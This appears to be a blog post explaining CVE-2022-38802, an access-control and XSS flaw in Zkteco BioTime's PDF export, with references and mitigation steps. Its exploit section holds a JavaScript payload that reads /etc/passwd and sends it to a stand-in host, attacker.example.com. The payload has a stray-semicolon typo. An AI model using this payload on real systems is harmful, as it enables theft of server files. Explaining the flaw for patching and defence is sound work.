CVE-2022-38802: Zkteco BioTime < 8.5.3 Build:20200816.447 Incorrect Access Control Exploit

Zkteco BioTime, a popular biometric attendance system, has a critical security vulnerability in versions older than 8.5.3 Build:20200816.447 that allows an authenticated administrator to exploit incorrect access control via the resign, private message, manual log, time interval, attshift, and holiday features. By leveraging an XSS vulnerability within the application's PDF generator, an attacker can read sensitive local files when exporting data as a PDF. This blog post aims to provide a clear understanding of this exploit (CVE-2022-38802), including code snippets, original references, and detailed explanations.

Details

The Zkteco BioTime system is vulnerable to an incorrect access control exploit due to improper handling of user privileges in certain features like resign, private message, manual log, time interval, attshift, and holiday functionalities. This vulnerability can be exploited by attackers who have administrative access to the application.

An attacker with administrator rights can execute an XSS attack within the application by injecting malicious JavaScript code into specific fields, which will be executed when exporting data as a PDF. As a result, the attacker can read sensitive local files from the server, potentially gaining access to sensitive information or even the ability to control the entire system.

Exploit

Below is a code snippet demonstrating how to exploit the XSS vulnerability in the PDF export function of Zkteco BioTime:

// Malicious JavaScript code injection
<script>
  // XMLHttpRequest to read local files
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (xhr.readyState == 4 && xhr.status == 200) {
      // Send the file content to a remote server
      var remote = new XMLHttpRequest();
      remote.open("POST", "https://attacker.example.com/data";, true);
      remote.send(xhr.responseText);
    }
  }

  // Target local file to read
  xhr.open("GET", "/etc/passwd", true);
  xhr.send();
</script>

The above malicious JavaScript code uses XMLHttpRequest to read local files on the target system, in this case '/etc/passwd'. It fetches the content of the file and sends it to a remote server controlled by the attacker at 'https://attacker.example.com/data'.

References

1. Original Advisory: https://nvd.nist.gov/vuln/detail/CVE-2022-38802
2. Zkteco BioTime: https://www.zkteco.com/en/product_detail/betime.html
3. Cross-Site Scripting (XSS): https://owasp.org/www-community/attacks/xss/

To defend against this exploit, users of Zkteco BioTime should take the following steps

1. Update their Zkteco BioTime software to the latest version (>= 8.5.3 Build:20200816.447) available from the vendor's website at https://www.zkteco.com/en.
2. Administrators should be cautious when granting access to other users, ensuring only trusted individuals have administrative rights.
3. Regularly monitor application logs for any suspicious activity or attempts to exploit vulnerabilities.

Conclusion

CVE-2022-38802 highlights the importance of keeping software up-to-date and the potential risks associated with the incorrect handling of user access controls. By understanding the exploit details, code snippets, and original references, administrators and developers can better protect their environments and users from security breaches. Updating to the latest Zkteco BioTime version and implementing the recommended security measures will mitigate the risks associated with this vulnerability.

Timeline

Published on: 11/30/2022 14:15:00 UTC
Last modified on: 12/02/2022 17:18:00 UTC